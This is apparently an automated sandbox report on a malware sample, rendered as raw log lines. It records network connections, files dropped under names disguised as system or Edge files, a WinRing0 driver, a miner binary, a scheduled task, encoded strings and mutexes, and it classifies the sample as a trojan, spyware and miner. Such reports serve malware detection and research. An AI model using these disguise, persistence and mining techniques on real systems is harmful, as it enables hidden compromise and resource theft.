                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49743 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49745 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49747 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49748 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49750 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49751 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49754 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49755 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49757 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49758 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49760 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49761 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49764 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49763 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49767 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49768 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49770 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49771 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49773 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49774 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49776 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49777 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49779 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49780 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49783 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49786 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49785 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49788 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49789 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49793 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49792 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49795 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49796 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49800 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49801 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49803 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49804 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49806 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49807 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49810 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49811 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49813 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49815 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49816 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49818 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49820 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49822 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49825 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49828 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49830 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49832 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49833 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49838 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49840 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49843 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49842 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49844 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49846 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49847 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49849 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49851 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49852 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49854 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49855 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49857 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49859 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49861 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49862 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49864 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49867 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49869 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49872 version: TLS 1.2
                        Source: conhost.exeProcess created: 91
                        Source: cmd.exeProcess created: 156

                        System Summary

                        barindex
                        PE file contains section with special chars
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name: .idata
                        Source: file.exeStatic PE information: section name:
                        Source: axplong.exe.0.drStatic PE information: section name:
                        Source: axplong.exe.0.drStatic PE information: section name: .idata
                        Source: axplong.exe.0.drStatic PE information: section name:
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\system32\Microsoft\Libs\WR64.sys
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\system32\services64.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\system32\Microsoft\Libs
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\system32\Microsoft\Libs\sihost64.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeFile created: C:\Windows\system32\Microsoft\Libs\WR64.sys
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C2E4406_2_00C2E440
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C2E4406_2_00C2E440
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C24CF06_2_00C24CF0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C630686_2_00C63068
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C57D836_2_00C57D83
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C24AF06_2_00C24AF0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C6765B6_2_00C6765B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C62BD06_2_00C62BD0
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C6777B6_2_00C6777B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C66F096_2_00C66F09
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C687206_2_00C68720
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 107_2_00007FFD9BAC0ECD107_2_00007FFD9BAC0ECD
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 139_2_00007FFD9BAA7642139_2_00007FFD9BAA7642
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 139_2_00007FFD9BAA6896139_2_00007FFD9BAA6896
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 139_2_00007FFD9BAA1141139_2_00007FFD9BAA1141
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeCode function: 144_2_00007FFD9BAC5772144_2_00007FFD9BAC5772
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeCode function: 144_2_00007FFD9BAC49C6144_2_00007FFD9BAC49C6
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 149_2_00007FFD9BA97642149_2_00007FFD9BA97642
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 149_2_00007FFD9BA96896149_2_00007FFD9BA96896
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeCode function: 149_2_00007FFD9BA9108D149_2_00007FFD9BA9108D
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeCode function: 159_2_00007FFD9BAD5772159_2_00007FFD9BAD5772
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeCode function: 159_2_00007FFD9BAD49C6159_2_00007FFD9BAD49C6
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: String function: 00C37870 appears 33 times
                        Source: Microsoft-Edge.exe.7.drStatic PE information: Number of sections : 18 > 10
                        Source: loader_5879465914.exe.6.drStatic PE information: Number of sections : 18 > 10
                        Source: loader_5879465914[1].exe.6.drStatic PE information: Number of sections : 18 > 10
                        Source: miner2.0.exe.82.drStatic PE information: No import functions for PE file found
                        Source: svchost64.exe.85.drStatic PE information: No import functions for PE file found
                        Source: services64.exe.107.drStatic PE information: No import functions for PE file found
                        Source: sihost64.exe.139.drStatic PE information: No import functions for PE file found
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: miner2.0.exe.82.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: svchost64.exe.85.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: services64.exe.107.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9973763198228883
                        Source: file.exeStatic PE information: Section: nataabbx ZLIB complexity 0.9948613709117556
                        Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9973763198228883
                        Source: axplong.exe.0.drStatic PE information: Section: nataabbx ZLIB complexity 0.9948613709117556
                        Source: svchost64.exe.85.dr, yelshopxrkiqn.csBase64 encoded string: 'iWKBihCY/NR2u0VfXDnEMncwh0+pxXUtzTeI9OrvHieB1/U+tWGISXa2FTtyWV+O6+W+tAp9+fgFtq/qVxQlVw==', 'ieY8ZO9hFlLqpClco4yeBCyILf6h/s5ppeMlqk0FmZM7ROwjOVibc0UXkbJKHIkF', 'ieY8ZO9hFlLqpClco4yeBCyILf6h/s5ppeMlqk0FmZM7ROwjOVibc0UXkbJKHIkF', 'khR1b64TY8z9/BVRlRAkypYyYygZVgfzIVqfSrRVbtMA20lP9OIeb/63pXaoY2a900uUXc3nISGt4d+8ks0DQA==', 'Ki2fV6sqVt3eaBbMfXV41tgWCJ8rn7dUf0dsiy7tudXkvwzgD95p4EQYv9YXNvC3XrIW7u1JVNv0R7qyqCBtAYmqXCDXTakehAYnHB1XiN6BFmssQDRphFG109HSpPEX', 'khR1b64TY8z9/BVRlRAkypYyYygZVgfzIVqfSrRVbtMA20lP9OIeb/63pXaoY2a9wxBCW4jCfj3W0Gk/iTDqkUthU1U/7dUdCI9IQrSzF8I=', 'Ki2fV6sqVt3eaBbMfXV41tgWCJ8rn7dUf0dsiy7tudXkvwzgD95p4EQYv9YXNvC3XrIW7u1JVNv0R7qyqCBtAYmqXCDXTakehAYnHB1XiN5GEgIS4IV/6UqQrQnxXiEM'
                        Source: WR64.sys.139.drBinary string: \Device\WinRing0_1_2_0
                        Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@314/69@4/4
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,7_2_00401B3F
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3248:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2944:120:WilError_03
